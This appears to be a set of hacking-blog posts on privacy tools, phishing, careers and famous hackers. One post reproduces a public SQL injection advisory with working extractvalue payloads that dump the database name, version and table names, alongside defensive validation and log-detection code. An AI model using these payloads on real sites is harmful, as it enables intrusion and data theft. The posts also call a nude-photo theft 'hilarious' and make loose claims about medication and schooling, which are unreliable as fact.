How To Protect Yourself From Corporate Censorship

  • Use Decentralized alternatives.
  • Fire up that VPN
  • Fortify your browser and your devices
  • Utilize Aliases for your own protection

Decentralized alternatives to popular websites on the internet are slowly beginning to pop up and gain prevalence as we are seeing increased prevalence on various media sources. Alternatives to YouTube and other social networking sites, like DTube, exist. Here is an article listing 4 popular decentralized social media platforms. Entirely decentralized portions of the internet are currently being tested. And of course we obviously have anonymizing darkwebs such as Tor, Freenet and I2P. However, I would be an idiot not to note the fact that these platforms have had extreme amounts of trouble gaining any sort of traction with their target audience due to the fact that they lack the addictive simplicity that services like Instagram, Facebook, and YouTube have. Only time will tell if one of these platforms will gain enough popularity to become a viable alternative to what we currently have.

Get a paid VPN. Securing your connection to the internet is of the utmost importance due to the potential for 3rd party eavesdroppers and the fact that we really don’t know what information is being given away by our internet service providers.

Utilize Tor or some other encrypted peer-to-peer darknet like I2P or Freenet. These systems are for the ultra-paranoid, and I don’t really recommend them for the average user who is simply trying to protect themselves preemptively.

Be careful what you download and get an Antivirus. Utilize www.virustotal.com to see if the file you have downloaded shows up on ANY antivirus. You can also use nodistribute.com if you don’t want your scan results sent to the antivirus companies. Protecting yourself from malware can help prevent your privacy from being invaded by governments or people.

Know your rights. Google around to know what the copyright and internet laws are in your area. Be aware of what the government can and cannot do to you legally.

Utilize secure Open Source software and host your own servers. Offshore servers may sometimes be necessary in the absolute worst cases of censorship. Open Source will ensure that no company will be able to revoke access to the software. The government hates open source because they can’t get their backdoors implanted into the code as easily, although it has potentially happened so be aware.

Note: I am speaking about all this in wake of the recent Mass censoring of Alex Jones and Infowars. Regardless of what your political ideology is, everyone deserves to be able to have their ideas heard. In current times, Corporate Censorship is a new breed altogether. Normally it would be the government, but with big corporate run media platforms anyone can be censored off the platforms if it serves the corporate interest. I’m no anti-capitalist. Quite the contrary, but I do think we need to push the free market in a direction that prevents censorship. Decentralized platforms and Open Source software can help with this. Stay safe.

 

Why Hacking Computers Will Free Your Mind.

Today children are indoctrinated at a young age into school systems around the world. These school systems use the same teaching methods that they’ve been using for hundreds of years. No one thinks to question why we haven’t changed our methods. That is because public school systems are extremely efficient at producing one thing. That thing is Laborers. Some people go to college and become skilled laborers, but most do not and remain unskilled laborers.

Laborers are very good at completing sets of tasks given to them by whoever is in charge. In other words, Laborers are machines that complete a given set of instructions.

Hmmm…. That sounds a lot like a computer. So through a 12-13 year process, humans are brainwashed and turned into machines that complete tasks. The problem with this is that the process of rewiring humans to complete monotonous tasks en repertoire causes their minds to become rigid. The children slowly lose the ability to imagine and problem solve.

Anyone who struggles and holds to their imagination is immediately seen as a problem child and is either remediated or medicated. Energetic young kids who would rather be outside experiencing life? ADHD. Kids who don’t struggle but rather become sluggish and unmotivated due to the repetitive nature of their tasks? Depressed. It takes years to get a doctorate degree in psychology but It only takes a few minutes for a kindergarten teacher to recommend children take legal meth.

Compound this with the fact that nobody except the elite gets taught anything about personal finance. They’re setting you up not only to be a brain-dead figurative (or literal) assembly-line worker, but a debt slave. Slavery never ended. It just evolved.

The answer is to focus on legitimate problem solving skills and reasoning. That compounded with a solid understanding of personal finance will bring you the freedom that you know you desire in your heart of hearts. I don’t care if you’re 15 or 55. If you have those two things, you’ll make it out and nobody will be able to tell you what to do.

There are many disciplines that teach problem solving and reasoning. Engineering, mathematics, chemistry, philosophy, business, finance, Computer Science, hacking. Any of these fields (and plenty that I missed) are respectable and will get you somewhere if you apply yourself. But If you’ve come to this blog in particular then you know which one I lean towards.

It’s the information age. Everything is increasingly influenced by computer networks and software. If you fully understand all of the networks and all of the software, then effectively, you are god.

But anyone who has done even a little bit of hacking knows that the more you learn in this profession, the more you begin to realize that you don’t know shit. The same could be said about a lot of the theoretical branches of science, but I can tell you that as we speak there is likely software being developed by some guy in his basement that will turn our world upside down within a few weeks, months or even years. Change is constant. Being forced to accept and adapt to this will grant you flexibility of mind. That’s why most college graduates can’t handle infosec in any respectable manner. They were taught on node.js when today everyone is using react and tomorrow they will be using angular. You get the picture.

This is a call to action of sorts. Go out there and solve problems. Download the Metasploitable 2 VM and start trying to hack it. It’s like a puzzle and you will definitely gain something from the experience.

Social Engineering In Action. Ukrainian Hackers Busted!

Free picture (Corruption in Ukraine Ukrainian hackers) from https://new.torange.biz/fx/corruption-ukraine-ukrainian-hackers-172199

The Hack

Three Ukrainian hackers connected to attacks on over 100 American businesses have been arrested. They used social engineering attacks and phishing attacks to steal financial information from a lot of businesses. These hackers were part of the Carbanak Group.

Frequently the group would send emails disguised as hotel reservations. Said emails would contain malware designed to steal sensitive data.

The Carbanak Group sent an FDA food poisoning related email to a restaurant. They attached a list of “inspections and checks” which the business opened. Of course, the attachment contained malware.

Dmytro Fedorov, Fedir Hladyr and Andrii Kolpakov are being charged with wire fraud, conspiracy, computer hacking, access device fraud, and identity theft. So it looks like jail time is very likely for the Carbanak Group.

How to prevent

What can I do to prevent such an attack on my personal life or business? Social engineering attacks are becoming extremely common today, because they are very easy to create and they tend to have a very high payoff for the hacker. First you need to know what phishing is. Phishing is when a hacker disguises some form of web service, message or other form of correspondence to make it appear like it’s coming from a legitimate source.

So my main advice is to always check the URL. Make sure it is secure (https) and if it has an SSL certificate that’s even better. If you receive an email, always look at the domain of the email. Any misspellings in the domain can mean that it’s fake. If there are attachments, do not open them until you have verification that they are safe. If you cannot get verification that it’s from a legitimate source, you can always scan the attachments before opening them, or analyze them within a VM.

Do not give your password away via plaintext ever. Use a VPN if you’re in public, as there are potentially people who could be eavesdropping on public networks (like at a Starbucks or McDonald’s Wi-Fi). And install an antivirus on your PC. Also get the antivirus’s browser addon. These addons can tell you if the site has been reported as a hacked site or a phishing attack.

XPATH SQL Injection Using a Recent Example

Xpath Injection

I’m going to show you a recent example of XPATH injection from exploit-db. This is a common method you’ll have to use when the basic Union Select injection doesn’t work and neither does a string injection. It’s a bit more tedious because you’ll have to use limit most of the time.

Fixing Injection

Fixing this kind of injection is relatively simple. According to OWASP:

“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”

Here is OWASP’s article on XPATH Injection Vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you’re an aspiring penetration tester, this is important to know as well so you can advise your clients.
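Added example (not from the original post and not MSVOD's code): the payload in the exploit below contains no quote characters, so quote escaping alone passes it through unchanged. This Python sketch shows that next to strict integer validation and a bound parameter. The `lists` table, the query shape and the function names are assumptions, and SQLite stands in for MySQL.

```python
import re
import sqlite3
from urllib.parse import unquote

# Payload from the advisory on this page, decoded as the application receives it.
PAYLOAD = unquote(
    "13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),"
    "concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20"
)


def escape_quotes(value: str) -> str:
    """Quote escaping only: backslash-escape backslashes and both quote types."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_query_unsafe(raw_cid: str) -> str:
    """Assumed shape of the vulnerable query: cid concatenated in numeric context."""
    return ("SELECT title FROM lists WHERE (cid = "
            + escape_quotes(raw_cid) + ") ORDER BY title")


def parse_cid(raw: str) -> int:
    """Accept a short run of ASCII digits and nothing else."""
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError("cid must be a decimal integer")
    return int(raw)


def fetch_titles(conn: sqlite3.Connection, raw_cid: str) -> list:
    """Hardened path: validate first, then bind the value as a parameter."""
    cid = parse_cid(raw_cid)
    rows = conn.execute(
        "SELECT title FROM lists WHERE (cid = ?) ORDER BY title", (cid,)
    )
    return [row[0] for row in rows]


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample data for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE lists (cid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO lists VALUES (?, ?)",
        [(13, "b-roll"), (13, "a-clip"), (7, "other")],
    )
    return conn


if __name__ == "__main__":
    conn = make_demo_db()
    # Escaping changes nothing, so the attacker's SQL lands in the statement.
    print("escaping altered payload:", escape_quotes(PAYLOAD) != PAYLOAD)
    print("unsafe statement:", build_query_unsafe(PAYLOAD))
    # The hardened path serves a legitimate id and rejects the payload.
    print("cid=13 ->", fetch_titles(conn, "13"))
    try:
        fetch_titles(conn, PAYLOAD)
    except ValueError as exc:
        print("payload rejected:", exc)
```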

Example exploit

# Exploit Title: MSVOD V10 - SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
# Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/

Payload:
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20

You can tell by looking at the payload that this is an XPATH injection because it uses “extractvalue”.

Here the cid parameter is vulnerable. But if you were to try union-based injection, it wouldn’t work. There are a few things to try in this scenario, but one of them is extractvalue.

The actual payload would be

/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --

Other than the Union Select being missing, there is really no difference in the injection.

However, in some cases with XPATH injection you will be stuck going by single lines, which can be very time consuming. You will have to use

limit 0,1, limit 1,1, limit 2,1, etc.

One example payload where you’d have to use this method:

?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--

Here is a link to a useful tutorial on XPATH injections. The English is a little bad, but if you have any questions don’t hesitate to ask them in the comments. This is only to be used for educational or legal purposes. Keep in mind that I take no responsibility for your actions.
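Added example (not part of the original post): a log check for the pattern described above. It flags requests whose decoded query string calls extractvalue and collects the limit offsets per client to spot row-by-row enumeration. The log lines are constructed in combined log format with documentation IP addresses; the `/item` path and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
EXTRACTVALUE_RE = re.compile(r"extractvalue\s*\(", re.I)
SCHEMA_RE = re.compile(r"information_schema\.", re.I)
LIMIT_RE = re.compile(r"\blimit\s+(\d+)\s*,\s*1\b", re.I)

# Constructed sample log; the payloads are the two shown on this page.
_ENUM = ("/item?id=1%20and%20extractvalue(rand(),concat(0x3a,(select%20"
         "concat(0x3a,table_name)%20from%20information_schema.tables%20{})))--")
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jul/2018:10:00:01 +0000] '
    '"GET /images/lists?cid=13 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Jul/2018:10:02:11 +0000] '
    '"GET /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),'
    'concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20 '
    'HTTP/1.1" 500 312',
    '198.51.100.9 - - [17/Jul/2018:10:05:00 +0000] "GET '
    + _ENUM.format("limit%200,1") + ' HTTP/1.1" 500 298',
    '198.51.100.9 - - [17/Jul/2018:10:05:02 +0000] "GET '
    + _ENUM.format("limit%201,1") + ' HTTP/1.1" 500 301',
    # Same request with the space double-encoded (%2520).
    '198.51.100.9 - - [17/Jul/2018:10:05:04 +0000] "GET '
    + _ENUM.format("limit%25202,1") + ' HTTP/1.1" 500 299',
]


def decode_query(target: str, rounds: int = 2) -> str:
    """Return the query string, percent-decoded up to `rounds` times."""
    query = urlsplit(target).query
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def scan(lines):
    """Map client IP -> summary of requests that call extractvalue()."""
    findings = defaultdict(
        lambda: {"requests": 0, "schema_access": False, "offsets": set()}
    )
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        query = decode_query(match["target"])
        if not EXTRACTVALUE_RE.search(query):
            continue
        entry = findings[match["ip"]]
        entry["requests"] += 1
        entry["schema_access"] |= bool(SCHEMA_RE.search(query))
        entry["offsets"].update(int(n) for n in LIMIT_RE.findall(query))
    return dict(findings)


def classify(entry) -> str:
    """Several distinct 'limit N,1' offsets indicate row-by-row enumeration."""
    if len(entry["offsets"]) >= 2:
        return "row-by-row enumeration"
    return "error-based probe"


if __name__ == "__main__":
    for ip, entry in sorted(scan(SAMPLE_LOG).items()):
        print(ip, classify(entry), entry["requests"], sorted(entry["offsets"]))
```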
The exploit-db and CVE:

NSE Nmap has Hidden Potential

Nmap is THE go-to tool for network mapping. What you might not know is that it also has an absurd amount of power and flexibility due to the fact that it also functions as a vulnerability scanner and an exploitation framework! Not only that, but it also doubles as a replacement for netcat, aka the hacker’s Swiss army knife. Yep, every recent Nmap installation comes with Ncat, the modernized clone of netcat that supports SSL encryption, making it the more practical of the two in today’s age of encryption.

Example usage:

$ ncat 192.168.1.100 80

But wait there’s more!

Nmap now has the Nmap Scripting Engine. This gives it way more versatility than ever before. None of this is new news to a lot of people, I realize, but it’s a bit impressive if you take a step back and think about the fact that Nmap started off as a simple port scanner.

To use NSE we must first locate where all the scripts are so we can know what we’ve got as well as where to put new scripts that we might code ourselves and also where to put scripts we’ve taken from the internet.

If you’re on Linux just type “locate *.nse”

$ locate *.nse
/usr/share/nmap/scripts/acarsd-info.nse
/usr/share/nmap/scripts/address-info.nse
/usr/share/nmap/scripts/afp-brute.nse
/usr/share/nmap/scripts/afp-ls.nse
/usr/share/nmap/scripts/afp-path-vuln.nse
/usr/share/nmap/scripts/afp-serverinfo.nse
/usr/share/nmap/scripts/afp-showmount.nse
/usr/share/nmap/scripts/ajp-auth.nse
/usr/share/nmap/scripts/ajp-brute.nse
/usr/share/nmap/scripts/ajp-headers.nse
/usr/share/nmap/scripts/ajp-methods.nse
/usr/share/nmap/scripts/ajp-request.nse
/usr/share/nmap/scripts/allseeingeye-info.nse
/usr/share/nmap/scripts/amqp-info.nse
/usr/share/nmap/scripts/asn-query.nse
...

Now we know where the scripts are installed, but how do we use it?

$ nmap -sC TargetNameHere

The above command will run the default scripts against a target (url or IP). The following is an example of how to use a specific script against a target.

$ nmap --script smb-check-vulns.nse 192.168.1.1

Now you know the basics, but the trick is to go out and learn how to write your own scripts. I’ll do that in a later tutorial if it’s asked for, but in the meantime, go and see if you can find some NSE scripts written by other people. There is a lot that people have accomplished on their own. That’s the beauty of open source. One example of this is nmap vulnerability scan on GitHub (link below). They have a script that connects to several regularly updated vulnerability databases and scans from those. Check the GitHub page for usage and installation instructions. This is a powerful tool, so I leave it in your hands. Don’t do anything stupid with it.

https://github.com/scipag/vulscan

How to Fortify your Browser (Chrome/Firefox)

The point of this add-on is to get 3rd party advertisements out of your web browser, which will help minimize the parties involved. Next, get NoScript (Firefox) or ScriptSafe (Chrome). This will allow you to selectively block various client-side script features on websites, thus making it safer to browse. Now get Self Destructing Cookies (Firefox) or Cookie AutoDelete (Chrome). These addons will destroy cookies when you close a connection (close a tab) with a website, which will prevent them from tracking you. Keep in mind, however, that they can still track you if you keep the tab open. Another great addon to try for both Chrome and Firefox is Disconnect. This addon will allow you to block various tracking requests.

The next thing you’ll want to do is utilize incognito mode (for Chrome) OR open a new private window (for Firefox). Both of these will put you in a browsing mode that won’t keep browsing history, cookies, or any site-specific information like login credentials.

You’ll also want a private paid VPN such as NordVPN. Remember that free VPNs are slow and insecure at best. At worst, they’re selling your information to 3rd parties. Remember: If they’re not selling you something, they’re selling you. 

Finally, for the majority of users I recommend an antivirus for obvious reasons. I also recommend a password manager such as Dashlane. Remembering every single password in this day and age is nearly impossible, so there is a great temptation to get your browser to do it for you. Don’t do this. There is malware specifically coded to steal credentials from the most popular browsers like Internet Explorer, Microsoft Edge, Firefox, Chrome, Safari, Opera, Iceweasel, etc.

That just about wraps it up for basic browser security. There are a few custom modifications you can make to the browsers themselves but that goes beyond the scope of this article. If this article receives enough likes or I get enough requests, I’ll make a tutorial on modifying the most popular browsers for privacy.

Note: Please remember that there is a difference between security, privacy and anonymity. Achieving anonymity online goes beyond the scope of this article. 

How Hackers Legally Earn Money From Home

Keyword here is legally, because what good is a million dollars if you’re in jail, right? So keep reading if you want to know how hackers escape the 9-5 wageslave system that is making everyone suicidally depressed.

Penetration Testing. I figured I’d start off with an obvious one: the most obvious way that hackers are making money from home. Companies and even small websites are paranoid that they’ll be the next headline database breach on the news, so they’re willing to pay big bucks to make sure that doesn’t happen. If you can earn the qualifications necessary to start freelancing, you can potentially be earning a comfortable salary from home by pentesting.

Writing. Here is one you probably didn’t think of. Hackers often get paid to write articles for technical companies. Oftentimes they’ll even get paid to contribute to blogs like this one!

Coding. This is another obvious one. You’re not a real hacker unless you can code. So why not make money off of that skill? Freelance programmers and web developers are in high demand these days, so job availability won’t be a big issue as long as you can market yourself. Knowing some coding languages can pay better than others though.

Helping Companies prevent theft. You might think I already covered this one with Penetration Testing. However, most if not all hackers have a thorough background or understanding of IT. Hackers can get paid by companies to place security measures like web application firewalls, antiviruses, encryption protocols and network firewalls. Knowing IT and network configuration pays off.

Best Resources to get Started Hacking as a Beginner

So in the future I will do an all-encompassing tutorial on what you should do in order to get started with hacking. But in this article I’m going to give you a list of great resources that helped me get from beginner to intermediate (at which point you should have a pretty clear idea of what you need to do).

  1. Codecademy
  2. Cybrary
  3. Hacksplaining

That’s it….. Well, sort of. That’s all you need to get started with the basics. First I’d recommend learning HTML, CSS, JavaScript, Python and command line basics on Codecademy. That won’t take you long at all. Once you’ve done that, head over to Cybrary and take a look at some of their courses. At minimum you’ll want to find a course that will take you over the basics of how networking works. The most comprehensive free overview of networking would probably be the Networking+ course. Then you could take a look at their Linux+ course. Both of these courses will supposedly prepare you for the CompTIA certifications, which is something to look into if you’re interested in a career in IT. The next thing you’ll want to do is head over to Hacksplaining and go through all their vulnerability overviews. They only cover web vulnerabilities but it’ll be a decent foundation for you as a newbie hacker. Understanding the OWASP top 10 vulnerabilities is an absolute must these days in my opinion.

Bonus!

  1. Metasploit Unleashed
  2. VulnHub

By this point you’re somewhat of an intermediate. You’ve got the basics of a few coding languages, you’ve got an understanding of Linux and networking, and you have an idea of what a vulnerability is. Metasploit Unleashed will teach you how to actually use vulnerabilities to compromise a system. This is where the real hacking begins. On top of that you’ll learn one of the quintessential industry standard hacking tools, Metasploit. After you’ve completed Metasploit Unleashed, go check out VulnHub for some vulnerable VMs that you can practice your skills on. Start with the tried and true ones like Mr. Robot and Kioptrix so you can follow along with the write-ups (tutorials) until you gain a thorough understanding.

And did I mention that all these resources are FREE? Yep. You don’t have to spend a dime to become a master hacker. Don’t listen to anyone who tells you that you do.

And after doing all that you’ll be a pro. Except not really.

Top 10 Most Infamous Hackers

Kevin Mitnick, a famous white hat hacker, is now a professional security consultant and entrepreneur. Among his exploits are the Pentagon, Nokia, and Motorola. He eventually got convicted and served 5 years in prison. Once he got out he became the rich security consultant we know today. Does crime pay? Perhaps if your reputation precedes you.

Gary McKinnon hacked into 97 U.S. Military and NASA computers during 2001 and 2002. He was looking for information on UFOs and evidence of a conspiracy that the US government was hiding technologies that could solve the energy crisis. He also shut down 1000 government computers and somehow rendered 300 of them inoperable, causing up to $700,000 in damages. Eventually he got caught but he dodged charges because he was Scottish and they denied his extradition.

Jonathan James AKA c0mrade started hacking as a kid and was the first minor to be arrested and sent to prison at the age of 16. He hacked into the Defense Threat Reduction Agency and NASA. He downloaded source code used for the International Space Station. He committed suicide in 2008 because he was afraid he was going to be wrongfully imprisoned for several attacks on corporate networks that he was under suspicion for.

Adrian Lamo would often hack into media sources and change details on the website. He would then notify the owners of the press source and help them fix their security. However, when he hacked into the New York Times he got arrested. Later on in life he ended up helping out law enforcement by turning in Chelsea Manning for being a source to WikiLeaks, which he now deeply regrets. Fun fact about Adrian Lamo: He had Asperger syndrome.

Ryan Collins was the hacker (or social engineer rather) behind “the fappening”, a hilarious exploit where Collins used the standard email phishing attack to gain access to celebrity iCloud accounts, where he was then able to obtain a whole bunch of their photos. Many of said photos happened to be sensitive. In fact, they were nude photos of several famous celebrities including Jennifer Lawrence, Kate Upton, and Kirsten Dunst. Several celebrities, including Ariana Grande, chose to deny the authenticity of the leaks.

Albert Gonzalez installed a sniffer in various corporate networks and was able to steal millions of users’ credit cards and ATM details. Apparently he sold about 170 million pieces of sensitive data, resulting in one of the largest cases of identity theft ever.

Astra is said to be a 58 year old Greek mathematician who hacked into a French corporation called Dassault Group and sold sensitive weapons information to various companies over a period of five years. When authorities caught him in 2008 they never revealed his information but just said that he was a 58 year old Greek mathematician. It just goes to show how versatile a degree in mathematics really is.

Kevin Poulsen stole wiretap info from the FBI, hacked a radio station’s phone lines in order to win a Porsche, helped law enforcement catch 744 sex predators over MySpace and is now a senior editor for Wired. How does your resume compare to that?

Loyd Blankenship 

I am a hacker, and this is my manifesto.  You may stop this individual,
but you can't stop us all... after all, we're all alike.

You may recognize this quote from the hacker manifesto. This famous manifesto was written by none other than Loyd Blankenship. His writings helped to inspire a generation of hackers to drop the controller and pick up a Linux distro. He was a member of the Legion of Doom hacker group and has been hacking since the 70s. You could call him one of the fathers of modern hacking. Whatever you call him, he’s definitely an OG.

 

Julian Assange started hacking when he was 16. He broke into NASA, the Pentagon, Citibank, Stanford, and Lockheed Martin. His biggest accomplishment was founding WikiLeaks. He is currently in the Ecuadorian Embassy in London trying to prevent his extradition.

What is a Social Engineer?

Social engineers are nothing new to society. In some sense they’ve always existed but they’ve just been going by different names. Conman, grifter, flimflammer, trickster. I think you get the point. A social engineer is a person who uses his social skills to manipulate people or organizations (or in some cases entire societies) into giving him what he wants.

Micro scale social engineering, however, is very different from macro scale social engineering. An example of micro scale social engineering would be when a conman tricks someone into lending him money and not giving it back (an inelegant con, but a con nonetheless). An example of macro scale social engineering would be wartime propaganda used to convince a society to support the war effort.

So where does this become relevant to me as a hacker? If you’re hacking a target you may find that public exploits are not available because the target is kept up to date and security is seemingly airtight. But oftentimes the weakest link in an organization is the human behind the desk. With social engineering you won’t even have to crack open your terminal to gain sensitive data and potentially access to a target. I’ll cover more in depth about methods employed by social engineers in future articles, but a great book to learn more about social engineering from a hacker’s perspective would be Social Engineering: The Art of Human Hacking. Go check it out or google around and do some research of your own.